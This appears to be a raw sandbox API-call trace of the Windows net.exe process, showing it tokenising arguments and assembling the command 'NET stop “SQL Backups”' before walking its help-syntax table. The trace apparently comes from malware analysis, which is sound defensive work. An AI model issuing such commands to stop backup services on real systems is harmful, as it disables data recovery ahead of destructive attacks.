_wcsicmp (_String1="WORK", _String2="“SQL") returned -8101 [0124.401] _wcsicmp (_String1="WORK", _String2="Backups") returned 21 [0124.401] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0124.401] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0124.401] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0124.401] _wcsicmp (_String1="WKSTA", _String2="“SQL") returned -8101 [0124.401] _wcsicmp (_String1="WKSTA", _String2="Backups") returned 21 [0124.401] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0124.401] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0124.401] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0124.401] _wcsicmp (_String1="PRDR", _String2="“SQL") returned -8108 [0124.401] _wcsicmp (_String1="PRDR", _String2="Backups") returned 14 [0124.401] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0124.401] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0124.401] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0124.401] _wcsicmp (_String1="DEVRDR", _String2="“SQL") returned -8120 [0124.401] _wcsicmp (_String1="DEVRDR", _String2="Backups") returned 2 [0124.401] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0124.401] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0124.401] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0124.401] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0124.402] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0124.402] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0124.402] _wcsicmp (_String1="SVR", _String2="“SQL") returned -8105 [0124.402] _wcsicmp (_String1="SVR", _String2="Backups") returned 17 [0124.402] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0124.402] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0124.402] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0124.402] _wcsicmp (_String1="SRV", _String2="“SQL") returned -8105 [0124.402] _wcsicmp (_String1="SRV", _String2="Backups") returned 17 [0124.402] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0124.402] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x31f750, nSize=0x0, Arguments=0x31f74c | out: lpBuffer="㶘yꔺ盹") returned 0x1c [0124.402] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0124.402] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0124.402] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0124.402] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0124.402] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0124.402] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0124.402] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0124.402] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0124.402] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0124.402] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0124.402] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0124.402] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0124.402] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0124.403] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0124.404] GetFileType (hFile=0x0) returned 0x0 [0124.404] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x794068 [0124.404] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x794068, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0124.404] WriteFile (in: hFile=0x0, lpBuffer=0x794068, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x31f730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f730, lpOverlapped=0x0) returned 0 [0124.404] LocalFree (hMem=0x794068) returned 0x0 [0124.404] GetFileType (hFile=0x0) returned 0x0 [0124.404] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x793bf8 [0124.404] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x793bf8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ny", lpUsedDefaultChar=0x0) returned 2 [0124.404] WriteFile (in: hFile=0x0, lpBuffer=0x793bf8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f730, lpOverlapped=0x0) returned 0 [0124.404] LocalFree (hMem=0x793bf8) returned 0x0 [0124.404] wcscpy_s (in: _Destination=0x31f7e8, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0124.404] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0124.404] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0124.404] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0124.404] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="“SQL", _MaxCount=0xffffffff | out: _Destination="NET stop “SQL") returned 0x0 [0124.404] wcsncat_s (in: _Destination="NET stop “SQL", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “SQL ") returned 0x0 [0124.404] wcsncat_s (in: _Destination="NET stop “SQL ", _SizeInWords=0x200, _Source="Backups", _MaxCount=0xffffffff | out: _Destination="NET stop “SQL Backups") returned 0x0 [0124.404] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y댸å1Ѱå") returned 0xad [0124.404] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET ACCOUNTS\r\n[/FORCE", _MaxCount=0x15) returned 18 [0124.404] LocalFree (hMem=0x7956d0) returned 0x0 [0124.404] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x2e [0124.405] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET COMPUTER\r\n\\\\compu", _MaxCount=0x15) returned 16 [0124.405] LocalFree (hMem=0x793de0) returned 0x0 [0124.405] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0x7d [0124.405] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET CONFIG SERVER\r\n[/", _MaxCount=0x15) returned 16 [0124.405] LocalFree (hMem=0x7956d0) returned 0x0 [0124.405] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x26 [0124.405] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET CONFIG\r\n[SERVER |", _MaxCount=0x15) returned 16 [0124.405] LocalFree (hMem=0x793de0) returned 0x0 [0124.405] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x19 [0124.405] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET CONTINUE\r\nservice", _MaxCount=0x15) returned 16 [0124.405] LocalFree (hMem=0x793de0) returned 0x0 [0124.405] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x1b [0124.405] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET FILE\r\n[id [/CLOSE", _MaxCount=0x15) returned 13 [0124.405] LocalFree (hMem=0x793de0) returned 0x0 [0124.405] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0xbe [0124.405] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET GROUP\r\n[groupname", _MaxCount=0x15) returned 12 [0124.405] LocalFree (hMem=0x7956d0) returned 0x0 [0124.405] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x33 [0124.405] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x15) returned 11 [0124.405] LocalFree (hMem=0x793de0) returned 0x0 [0124.405] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x19 [0124.405] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET HELPMSG\r\nmessage#", _MaxCount=0x15) returned 11 [0124.405] LocalFree (hMem=0x793de0) returned 0x0 [0124.405] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0xc1 [0124.405] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET LOCALGROUP\r\n[grou", _MaxCount=0x15) returned 7 [0124.405] LocalFree (hMem=0x7956d0) returned 0x0 [0124.405] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x16 [0124.405] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET PAUSE\r\nservice\r\n\r", _MaxCount=0x15) returned 3 [0124.405] LocalFree (hMem=0x793de0) returned 0x0 [0124.405] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x33 [0124.405] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET SESSION\r\n[\\\\compu", _MaxCount=0x15) returned 15 [0124.405] LocalFree (hMem=0x793de0) returned 0x0 [0124.405] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0x234 [0124.406] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET SHARE\r\nsharename\r", _MaxCount=0x15) returned 12 [0124.406] LocalFree (hMem=0x7956d0) returned 0x0 [0124.406] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x13 [0124.406] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET START BROWSER\r\n", _MaxCount=0x15) returned 14 [0124.406] LocalFree (hMem=0x793de0) returned 0x0 [0124.406] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x14 [0124.406] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x15) returned 14 [0124.406] LocalFree (hMem=0x793de0) returned 0x0 [0124.406] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x14 [0124.406] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET START EVENTLOG\r\n", _MaxCount=0x15) returned 14 [0124.406] LocalFree (hMem=0x793de0) returned 0x0 [0124.406] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x15 [0124.406] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET START MESSENGER\r\n", _MaxCount=0x15) returned 14 [0124.406] LocalFree (hMem=0x793de0) returned 0x0 [0124.406] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x15 [0124.406] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET START NET LOGON\r\n", _MaxCount=0x15) returned 14 [0124.406] LocalFree (hMem=0x793de0) returned 0x0 [0124.406] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x16 [0124.406] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET START RPCLOCATOR\r", _MaxCount=0x15) returned 14 [0124.406] LocalFree (hMem=0x793de0) returned 0x0 [0124.406] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x11 [0124.406] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET START RPCSS\r\n", _MaxCount=0x15) returned 14 [0124.407] LocalFree (hMem=0x793de0) returned 0x0 [0124.407] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x14 [0124.407] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET START SCHEDULE\r\n", _MaxCount=0x15) returned 14 [0124.407] LocalFree (hMem=0x793de0) returned 0x0 [0124.407] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x12 [0124.407] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET START SERVER\r\n", _MaxCount=0x15) returned 14 [0124.407] LocalFree (hMem=0x793de0) returned 0x0 [0124.407] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0xf [0124.407] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET START UPS\r\n", _MaxCount=0x15) returned 14 [0124.407] LocalFree (hMem=0x793de0) returned 0x0 [0124.407] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x17 [0124.407] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET START WORKSTATION", _MaxCount=0x15) returned 14 [0124.407] LocalFree (hMem=0x793de0) returned 0x0 [0124.407] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x18 [0124.407] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET START\r\n[service]\r", _MaxCount=0x15) returned 14 [0124.407] LocalFree (hMem=0x793de0) returned 0x0 [0124.407] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x2a [0124.407] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET STATISTICS\r\n[WORK", _MaxCount=0x15) returned 14 [0124.407] LocalFree (hMem=0x793de0) returned 0x0 [0124.407] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x15 [0124.407] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x15) returned 19 [0124.407] LocalFree (hMem=0x793de0) returned 0x0 [0124.407] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0x58 [0124.407] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET TIME\r\n\r\n[\\\\comput", _MaxCount=0x15) returned -1 [0124.407] LocalFree (hMem=0x7956d0) returned 0x0 [0124.407] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0x184 [0124.407] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET USE\r\n[devicename ", _MaxCount=0x15) returned -2 [0124.407] LocalFree (hMem=0x7956d0) returned 0x0 [0124.407] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0xc7 [0124.407] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET USER\r\n[username [", _MaxCount=0x15) returned -2 [0124.407] LocalFree (hMem=0x7956d0) returned 0x0 [0124.408] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0x47 [0124.408] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET VIEW\r\n[\\\\computer", _MaxCount=0x15) returned -3 [0124.408] LocalFree (hMem=0x7956d0) returned 0x0 [0124.408] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0xc2 [0124.408] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NET\r\n [ ACCOUNTS |", _MaxCount=0x15) returned 19 [0124.408] LocalFree (hMem=0x7956d0) returned 0x0 [0124.408] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0x319 [0124.408] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="SERVICES\r\nNET START c", _MaxCount=0x15) returned -5 [0124.408] LocalFree (hMem=0x7956d0) returned 0x0 [0124.408] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0x483 [0124.408] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="SYNTAX\r\nThe following", _MaxCount=0x15) returned -5 [0124.408] LocalFree (hMem=0x7956d0) returned 0x0 [0124.408] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0xa86 [0124.408] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="NAMES\r\nThe following ", _MaxCount=0x15) returned 4 [0124.408] LocalFree (hMem=0x7956d0) returned 0x0 [0124.408] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0x54 [0124.408] _wcsnicmp (_String1="NET stop “SQL Backups", _String2="\r\nFor more informatio", _MaxCount=0x15) returned 97 [0124.408] LocalFree (hMem=0x7956d0) returned 0x0 [0124.408] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1囐y1") returned 0xad [0124.408] _wcsnicmp (_String1="NET stop “SQL", _String2="NET ACCOUNTS\r", _MaxCount=0xd) returned 18 [0124.408] LocalFree (hMem=0x7956d0) returned 0x0 [0124.408] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x2e [0124.408] _wcsnicmp (_String1="NET stop “SQL", _String2="NET COMPUTER\r", _MaxCount=0xd) returned 16 [0124.408] LocalFree (hMem=0x793de0) returned 0x0 [0124.409] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0x7d [0124.409] _wcsnicmp (_String1="NET stop “SQL", _String2="NET CONFIG SE", _MaxCount=0xd) returned 16 [0124.409] LocalFree (hMem=0x7956d0) returned 0x0 [0124.409] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x26 [0124.409] _wcsnicmp (_String1="NET stop “SQL", _String2="NET CONFIG\r\n[", _MaxCount=0xd) returned 16 [0124.409] LocalFree (hMem=0x793de0) returned 0x0 [0124.409] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x19 [0124.409] _wcsnicmp (_String1="NET stop “SQL", _String2="NET CONTINUE\r", _MaxCount=0xd) returned 16 [0124.409] LocalFree (hMem=0x793de0) returned 0x0 [0124.409] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x1b [0124.409] _wcsnicmp (_String1="NET stop “SQL", _String2="NET FILE\r\n[id", _MaxCount=0xd) returned 13 [0124.409] LocalFree (hMem=0x793de0) returned 0x0 [0124.409] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0xbe [0124.409] _wcsnicmp (_String1="NET stop “SQL", _String2="NET GROUP\r\n[g", _MaxCount=0xd) returned 12 [0124.409] LocalFree (hMem=0x7956d0) returned 0x0 [0124.409] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x33 [0124.409] _wcsnicmp (_String1="NET stop “SQL", _String2="NET HELP\r\ncom", _MaxCount=0xd) returned 11 [0124.409] LocalFree (hMem=0x793de0) returned 0x0 [0124.409] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x19 [0124.409] _wcsnicmp (_String1="NET stop “SQL", _String2="NET HELPMSG\r\n", _MaxCount=0xd) returned 11 [0124.409] LocalFree (hMem=0x793de0) returned 0x0 [0124.409] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0xc1 [0124.409] _wcsnicmp (_String1="NET stop “SQL", _String2="NET LOCALGROU", _MaxCount=0xd) returned 7 [0124.409] LocalFree (hMem=0x7956d0) returned 0x0 [0124.409] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x16 [0124.409] _wcsnicmp (_String1="NET stop “SQL", _String2="NET PAUSE\r\nse", _MaxCount=0xd) returned 3 [0124.409] LocalFree (hMem=0x793de0) returned 0x0 [0124.409] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x33 [0124.409] _wcsnicmp (_String1="NET stop “SQL", _String2="NET SESSION\r\n", _MaxCount=0xd) returned 15 [0124.409] LocalFree (hMem=0x793de0) returned 0x0 [0124.409] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="囐y⡋盺1㷠y1") returned 0x234 [0124.409] _wcsnicmp (_String1="NET stop “SQL", _String2="NET SHARE\r\nsh", _MaxCount=0xd) returned 12 [0124.409] LocalFree (hMem=0x7956d0) returned 0x0 [0124.409] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1囐y1") returned 0x13 [0124.409] _wcsnicmp (_String1="NET stop “SQL", _String2="NET START BRO", _MaxCount=0xd) returned 14 [0124.410] LocalFree (hMem=0x793de0) returned 0x0 [0124.410] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x31f730, nSize=0x0, Arguments=0x31f72c | out: lpBuffer="㷠y⡋盺1㷠y1") returned 0x14 [0124.410] _wcsnicmp 